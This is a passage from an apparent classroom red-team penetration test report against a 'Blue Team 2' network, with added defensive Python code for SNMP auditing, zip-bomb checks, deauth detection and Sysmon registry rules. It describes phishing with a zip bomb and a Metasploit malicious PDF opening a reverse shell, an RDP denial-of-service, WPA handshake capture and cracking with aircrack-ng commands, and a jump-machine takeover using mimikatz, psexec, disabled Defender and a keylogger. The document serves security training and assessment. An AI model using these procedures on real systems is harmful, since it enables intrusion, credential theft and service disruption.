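        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive in COMMUNITY_DIRECTIVES:
            idx = 3 if directive == "com2sec" else 1
            community = parts[idx] if len(parts) > idx else ""
            severity = "HIGH" if community.lower() in DEFAULT_COMMUNITIES else "MEDIUM"
            findings.append((lineno, severity,
                             f"{directive}: v1/v2c community string is sent in cleartext"))
        elif directive in {"rouser", "rwuser"}:
            # rouser/rwuser USER [noauth|auth|priv]; only priv gives encryption.
            level = parts[2].lower() if len(parts) > 2 else "auth"
            if level == "priv":
                v3_priv_users += 1
            else:
                findings.append((lineno, "MEDIUM",
                                 f"{directive}: SNMPv3 user without priv (no encryption)"))
    return {"findings": findings, "v3_priv_users": v3_priv_users}


def is_acceptable(result):
    """Accept only configs with no community access and at least one authPriv v3 user."""
    return not result["findings"] and result["v3_priv_users"] > 0


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SNMPD_CONF), ("hardened", HARDENED_SNMPD_CONF)):
        res = audit_snmpd_conf(cfg)
        print(name, "acceptable" if is_acceptable(res) else "NOT acceptable", res["findings"])
```

A "MEDIUM" rating for a non-default community is deliberate: a strong community string limits guessing but does nothing against the sniffing shown in this section, so only the v3 path clears the check.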

11 Social engineering

11.1 Creation of a zip bomb and sending it with a mail
A zip bomb, also known as a Zip of Death or decompression bomb, is a malicious archive file
designed to crash or render useless the program or system reading it.
Operating system used: Windows

- Create a new text file and name it hello.txt
- Fill the file with null bytes
- Create several copies in the same directory and name them accordingly
- Compress the folder that contains the files

Sending the file with e-mail

Figure 35. Sending Zip Bomb

Scenario: The folder is sent as a report from the IT Department, and the employee, not knowing
what exactly ITCheckResults.zip contains, opens it.
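The archive built by the recipe above is dangerous only to software that inflates it without looking at the numbers first. The Python below is an added example (not from the report) of the receiving side's two checks: first judge the archive from its central directory (declared sizes, compression ratio, nested archives) without inflating anything, then, if it passes, inflate under a hard byte budget because the declared sizes can be forged. To have something to test it on, the block builds a small archive by the report's own recipe (several copies of a null-byte file) as constructed input; the 50 MiB and 100:1 limits are assumed policy values.

```python
"""Decompression-bomb guard for zip archives (added example; constructed inputs)."""
import io
import os
import zipfile

MAX_TOTAL_UNCOMPRESSED = 50 * 1024 * 1024   # assumed policy: 50 MiB per archive
MAX_RATIO = 100                              # assumed policy: reject above 100:1
CHUNK = 64 * 1024


def build_sample_zip(copies=8, size=1024 * 1024):
    """Constructed test input following the recipe in 11.1: copies of a null-byte file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for i in range(copies):
            zf.writestr(f"ITCheckResults/hello{i}.txt", b"\x00" * size)
    return buf.getvalue()


def build_benign_zip():
    """Constructed control input: one member of incompressible random bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("report.bin", os.urandom(4096))
    return buf.getvalue()


def inspect_zip(data, max_total=MAX_TOTAL_UNCOMPRESSED, max_ratio=MAX_RATIO):
    """First gate: judge the archive from its central directory, inflating nothing."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    total_u = sum(i.file_size for i in infos)
    total_c = sum(i.compress_size for i in infos)
    ratio = total_u / max(total_c, 1)
    reasons = []
    if total_u > max_total:
        reasons.append(f"declared size {total_u} exceeds budget {max_total}")
    if ratio > max_ratio:
        reasons.append(f"compression ratio {ratio:.0f}:1 exceeds {max_ratio}:1")
    if any(i.filename.lower().endswith(".zip") for i in infos):
        reasons.append("nested archive (possible recursive bomb)")
    return {"verdict": "reject" if reasons else "ok", "members": len(infos),
            "uncompressed": total_u, "compressed": total_c, "ratio": ratio,
            "reasons": reasons}


def guarded_extract_bytes(data, budget):
    """Second gate: inflate with a hard byte budget. Header sizes can be forged,
    so the only reliable counter is the number of bytes actually produced.
    Returns (bytes_produced, aborted)."""
    produced = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            with zf.open(info) as member:
                while True:
                    chunk = member.read(CHUNK)
                    if not chunk:
                        break
                    produced += len(chunk)
                    if produced > budget:
                        return produced, True   # stop: archive is over budget
    return produced, False


if __name__ == "__main__":
    bomb = build_sample_zip()
    print("bomb-like archive:", inspect_zip(bomb)["reasons"])
    print("benign archive:", inspect_zip(build_benign_zip())["verdict"])
    print("guarded extraction:", guarded_extract_bytes(bomb, 4 * 1024 * 1024))
```

Deflate tops out near 1032:1 on null bytes, so even the tiny sample archive trips the ratio check by an order of magnitude; a mail gateway or a scanner that applies only the first gate is still exposed to archives with falsified headers, which is why the byte budget during inflation is the check that actually protects the host.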

11.2 Sending malicious files
Tool used: Metasploit Framework
Vulnerability exploited: the Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer
Overflow
Step 1: Enter the module of adobe_utilprintf
Step 2: Use reverse shell (setting payload)
Step 3: Setting localhost and localport (the IP address to which the target machine connects,
and the port that the listener binds to)
Step 4: Creation of the malicious file
Step 5: Setting up the listener to capture the reverse connection

The mail can be sent using a little script in the Kali terminal, or just by sending it as a simple
user would do, attaching the file and sending it by e-mail.

Figure 36. Creation of malicious file

Figure 37. Reverse TCP

Sending it from the terminal looks like this:

Figure 38. Sending file with email

In a real-life scenario, the file would be opened by an employee who is not aware of the
risk. In this case, Blue Team 2 was aware of the attacks that Red Team 2 was performing, so they
didn’t click on the file.

12 Remote Desktop Protocol (RDP) scan and attack

From the information we gathered during our scanning sessions and enumerations, we found
that their RDP service is enabled and uses port 3390 (instead of the default 3389).
To identify whether the host is vulnerable to an RDP attack, we use the MS12-020-check module from
Metasploit.
Framework: Metasploit
Module(s): scanner/rdp/ms12_020_check, dos/windows/rdp/ms12_020_maxchannelids
MS12-020-check: this vulnerability could allow remote code execution if an attacker sends a
sequence of specially crafted RDP packets to an affected system. https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-020

Checking RDP vulnerability with ms12_020_check module

Figure 39. RDP Scan

Attacking RDP with the ms12_020_maxchannelids module

Figure 40. Attacking RDP

Results: From the output of the Metasploit module we received “Service Unreachable” after sending
the crafted RDP packets, which means either that we were able to disrupt their RDP service for some
seconds or that this was a false positive alarm.

Improvements

- Install the latest security updates from the vendor.

Reference: https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-020

13 Hacking Wi-Fi
For this hacking method we need a wireless network adapter that supports monitor mode. Our
laptop’s built-in wireless card could also work, but generally an external card with extended
range capability is advised. In our testing we used a USB WiFi Wireless Adapter Ethernet
Dual Antenna Long Range, like the one in the picture below, with 150 Mbps capability.

Figure 41. Wireless Adapter Ethernet Dual Antenna

Step 1.

- airmon-ng start wlan0

This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the
wireless traffic that passes by us in the air.

Figure 42. Wireless traffic monitor

Step 2.

- airodump-ng wlan0mon

This command grabs all the traffic that our wireless adapter can see and displays critical
information about it, including the BSSID (the MAC address of the AP), power, number of
data frames, channel, speed, encryption (if any) and the SSID.

Figure 43. Target Victim

Step 3.

In our next step we focus our efforts on the Blue Team AP, on one channel, and capture traffic
data from it. We use the following command:

- airodump-ng --bssid 78:8A:20:D4:57:45 -c 11 --write Wteam2 wlan0mon

Step 4.
In order to capture the encrypted password, we need to have the client authenticate against
the AP. If they are already authenticated, we can de-authenticate them (kick them off) and
their system will automatically re-authenticate, whereby we can grab their encrypted
password in the process. To make this possible, we use the following command:

- aireplay-ng -0 5 -a 08:86:30:74:22:76 -c wlan0mon

Figure 44. Deauthentication

Now we wait until we sniff enough packets from the wireless traffic of the AP, in order to get the
WPA handshake.

Figure 45. Sniffing from wireless traffic of the AP

Step 5.
Now we have our Wteam2.cap file, which contains the encrypted password. Our last step is to
crack the password from this file. There are several methods to try for cracking an encrypted
password. If we have a good wordlist we try the aircrack-ng command, because it has a high
testing rate, obviously depending on our hardware capabilities. So now we test the Wteam2 packet
file against our wordlist, which contains a high number of possible passwords.

- aircrack-ng Wteam2-01.cap -w /root/Desktop/wordlists/r0ckyou.txt

Figure 46. Crack the password
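Step 4 is the part of this procedure that a wireless IDS can see: a burst of deauthentication frames aimed at an AP, usually to the broadcast address, arriving far faster than any client would leave on its own. The Python below is an added example (not from the report or the aircrack-ng suite) of that detector: it keeps a sliding one-second window of deauth/disassociation frames per BSSID and raises one alert per BSSID when the count crosses a threshold. The frames and BSSIDs are constructed placeholders; in practice the records would come from a monitor-mode capture. The mitigation that removes the attack rather than just detecting it is 802.11w Protected Management Frames, under which forged deauths fail the integrity check and clients ignore them.

```python
"""Deauthentication-flood detector over 802.11 management frames (added example; constructed data)."""
from collections import defaultdict, deque

BEACON, DISASSOC, DEAUTH = 0x08, 0x0a, 0x0c   # management frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"

AP_A = "00:11:22:33:44:55"   # constructed BSSID that gets flooded
AP_B = "66:77:88:99:aa:bb"   # constructed BSSID seeing only normal churn

# Constructed capture: (timestamp_s, subtype, bssid, destination).
SAMPLE_FRAMES = (
    [(9.0 + 0.1 * i, BEACON, AP_A, BROADCAST) for i in range(10)]     # beacons, ignored
    + [(10.0 + 0.1 * i, DEAUTH, AP_A, BROADCAST) for i in range(6)]   # 6 deauths in 0.5 s
    + [(20.0, DEAUTH, AP_B, "de:ad:be:ef:00:01"),                      # a client really leaving
       (25.0, DISASSOC, AP_B, "de:ad:be:ef:00:02")]
)


def detect_deauth_flood(frames, window=1.0, threshold=5):
    """Alert once per BSSID when >= threshold deauth/disassoc frames fall inside one window.

    Returns a list of dicts: bssid, count in the window, time of the alert, and
    whether any frame in the window was a broadcast deauth (kicks every client).
    """
    recent = defaultdict(deque)     # bssid -> deque of (timestamp, destination)
    alerts, alerted = [], set()
    for t, subtype, bssid, dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append((t, dst))
        while q and t - q[0][0] > window:   # slide the window forward
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "count": len(q), "at": t,
                           "broadcast": any(d == BROADCAST for _, d in q)})
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"deauth flood on {alert['bssid']}: {alert['count']} frames at t={alert['at']:.1f}s"
              f" (broadcast={alert['broadcast']})")
```

The threshold of five frames per second is deliberately low: legitimate deauths are rare and per client, so even a small burst to the broadcast address is a strong signal, while a tuned deployment would add the source address of the frames and the observed signal strength to separate a rogue transmitter from the real AP.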

14 Hacking the Jump Machine

The main purpose of this kind of attack is to reach the jump machine that the target IT admins
are using to log in to their environment, with the final goal of getting users and passwords. To make
this possible we decided to first hack a local PC we were using in our class, supposing that the
image used by KPT is the same everywhere (including the jump machine). Once we have the
local admin password (which can be the same on every PC of KPT), we can control the jump
machine.

Phase 1 “Taking Control”:

1. Booting from a live CD (Hiren’s BootCD PE)
2. Copying the SAM and SYSTEM files from C:\Windows\System32\Config

Figure 47. Copying SAM and System files

3. Extracting the NTLM hashes of the local users (mimikatz)

Figure 48. Extract NTLM Hashes

4. Decrypt the hashes with an online decryptor (www.onlinehashcrack.com)

Figure 49. Decrypt Hashes

5. Log in with pcadmin using the found password.

Figure 50. Logging in with local account

6. Open the CMD of the target victim PC with PsTools (psexec command)
After logging in to our compromised PC with the local admin account (pcadmin), we
run the target PC’s command prompt using PsExec from PsTools.

Figure 51. psexec command

7. Confirming that we are in the cmd of the target PC

Figure 52. Victim machine-cmd

8. Enabling RDP on the target PC by editing the Windows Registry

In order to proceed with our plan of taking control of the jump machine, we decided to
enable RDP on the target PC by editing the respective registry value.

Figure 53. Enabling RDP

9. Disable Firewall (Windows Defender)
In this step we temporarily disable Windows Defender.

Figure 54. Disable Firewall

10. Creating a folder “kot” on the D drive, sharing it and making it hidden

In order to have an excluded path (folder) in which to install our tool, we created a folder
named “kot” on the D drive, made it hidden, and shared it so that it is easily reachable
by us.

Figure 55. Hiding the folder

11. Excluding the “kot” folder from the firewall
In this way we can safely proceed to copy the tool and install it in this excluded path.

Figure 56. Exclude Keylogger Folder

12. Installing Windows Spy Keylogger in the path D:\kot

Figure 57. Installing Keylogger

13. Testing that the keylogger is active
In this step we simulate the victim typing and see the log file being populated.

Figure 58. Testing Keylogger

14. Checking that the shared folder is reachable:

Figure 59. Checking the shared folder
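Steps 8 through 12 of Phase 1 each leave a registry write behind: RDP is switched on by setting `fDenyTSConnections` to 0, Defender is turned off, an exclusion path is added so the keylogger folder is not scanned, and a share is registered for the folder. Sysmon records every such write as Event ID 13 (RegistryEvent, value set) with the key in `TargetObject` and the new data in `Details`, which makes this whole phase detectable from the host. The Python below is an added example (not from the report) of the matching rules run over a constructed batch of events in the Sysmon Event ID 13 field layout; the registry paths are the real Windows locations, `D:\kot` is the folder name from the report, and the images, values and the benign Explorer setting at the end are constructed.

```python
"""Rules over Sysmon Event ID 13 registry events for the Phase 1 host changes (added example)."""
import re

# Each rule: name, regex on TargetObject, predicate on Details (the value written).
# Sysmon renders DWORD data as "DWORD (0x........)".
RULES = [
    ("RDP enabled (fDenyTSConnections=0)",
     r"\\Control\\Terminal Server\\fDenyTSConnections$",
     lambda d: d.endswith("(0x00000000)")),
    ("Defender disabled by policy (DisableAntiSpyware=1)",
     r"\\Windows Defender\\DisableAntiSpyware$",
     lambda d: d.endswith("(0x00000001)")),
    ("Defender exclusion path added",
     r"\\Windows Defender\\Exclusions\\Paths\\",
     lambda d: True),
    ("SMB share registered",
     r"\\Services\\LanmanServer\\Shares\\",
     lambda d: True),
]

# Constructed events in the Sysmon ID 13 field layout; the last one is a benign user setting.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\D:\kot",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\LanmanServer\Shares\kot",
     "Details": "CSCFlags=0 MaxUses=4294967295 Path=D:\\kot ShareName=kot Type=0"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",   # benign: "show hidden files" toggle
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]


def evaluate(events, rules=RULES):
    """Return one finding per (event, rule) match: rule name, writing process, key."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        target = ev.get("TargetObject", "")
        details = ev.get("Details", "")
        for name, pattern, pred in rules:
            if re.search(pattern, target, re.IGNORECASE) and pred(details):
                findings.append({"rule": name, "image": ev.get("Image", ""), "target": target})
    return findings


def rules_triggered(events, rules=RULES):
    """Sorted, de-duplicated rule names that fired; several in one short span is the signal."""
    return sorted({f["rule"] for f in evaluate(events, rules)})


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"[{f['rule']}] by {f['image']} -> {f['target']}")
```

Any one of these writes can be legitimate administration, so the useful alert is on the combination: RDP enabled, Defender weakened and a fresh share on the same host within minutes, written by `reg.exe` or a remotely launched shell rather than by Group Policy. The same events also show why the root cause in this section, one local administrator password shared across the image, matters: a per-machine local admin password (Microsoft's LAPS) would have stopped the hash from step 3 from opening the jump machine at all.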

Phase 2 “Elaborating the populated Log file”:

1. Checking that the log file is being populated with data (username and password of the
firewall):

Figure 60. Checking the log file

2. Finding the user and password of a domain user (potentially a domain admin)

Figure 61. Finding User and Password

3. Ticketing system user and password:

Figure 62. Ticket System

4. Logging in to the Windows machine and confirming that the found credentials work
In this step we use the username and password extracted from the logs to log in to their
environment (in this case a Windows machine). The certificate acceptance prompt
means that our credentials are the right ones.

Figure 63. Login to Windows machine

5. Finding the IP of the DNS (potentially the Domain Controller IP)
After login we figure out (from the enabled roles) that this machine is not their most
important one (Hyper-V or Domain Controller). The next step is to reach the DC.

Figure 64. Finding the IP of DNS

6. Logging in to the Windows machine (which turns out to be their DC and Hyper-V server):
Using the same credentials we were able to log in to their Domain Controller, which has the
AD, DNS and Hyper-V roles enabled.

Figure 65. Login to the Windows Machine

7. Hello Team
No comment..

Figure 66. List of BT2 users

8. Exploring the virtual infrastructure:
We can now reach every running machine, practically everything.

Figure 67. Exploring the virtual Infrastructure

9. Ubuntu machine (left open):

Figure 68. Ubuntu Machine (left open)

10. Exploring the firewall
In this step we log in and explore their firewall.

Figure 69. Exploring the Firewall

11. No NAT configured for the VPN peer (which means that the VPN does not work)
The VPN peer is not accessible from outside, which means that it cannot be
reached.

Figure 70. No NAT configured for VPN peer

15 Summary

Initial reconnaissance of the Blue Team network resulted in the discovery of a pfSense appliance
as the firewall, together with a Snort monitoring system that isolates the internal system from
external attacks.
The results provided us with a listing of specific services to target for this assessment. An attack
revealed the credentials of the FTP server. After a few trials we were not able to gain access to
this server by uncovering the password via brute force with Hydra. Another attempt was to prove its
vulnerability to buffer overflow.
After obtaining access to the FTP server, it was kept and we added malicious files inside it
that would cause a system crash leading to data corruption.
Also, we created a malicious file and a zip bomb in order to send them via e-mail (the target was the SMTP
server) using social engineering. At the moment an employee inside the ‘Company’ clicks
the files, which have legitimate and realistic names, it brings application crashes and denial of service
to the legitimate users.
After a closer examination, we discovered that the RDP service of the target system is vulnerable to
remote code execution through a flow of crafted RDP packets; after exploitation the RDP
service was disrupted for some seconds, or this may have been a false positive alarm.
A successful exploitation consisted of creating a persistent backdoor with reverse HTTP, which
could obtain shell access on the target at the moment the user clicks it (what may bring the
user to click is social engineering).
Privilege escalation through Windows flaws made it possible for us to install a keylogger on the
Blue Team 2 client PC. After successful installation, we were able to capture all entered passwords
and therefore we gained access to all their infrastructure.

Blue Team 2 suffered a series of control failures, which led to a potential compromise of
sensitive system assets.
These failures would have had a dramatic effect on the services that this ‘Company’ offers if a
malicious party had exploited them.
FTP and web services were vulnerable to MITM attack; it was also possible to create a backdoor which
cannot be detected by the antivirus.
The specific goals of the penetration test were stated as:
- Identifying if a remote attacker could penetrate the Blue Team 2 firewall
- Determining the impact of a security breach on:
  - Confidentiality of the company’s information
  - Availability of Blue Team 2 information systems
These goals of the penetration test were met. A targeted attack against Blue Team 2 can result in
a potential compromise of organizational assets.
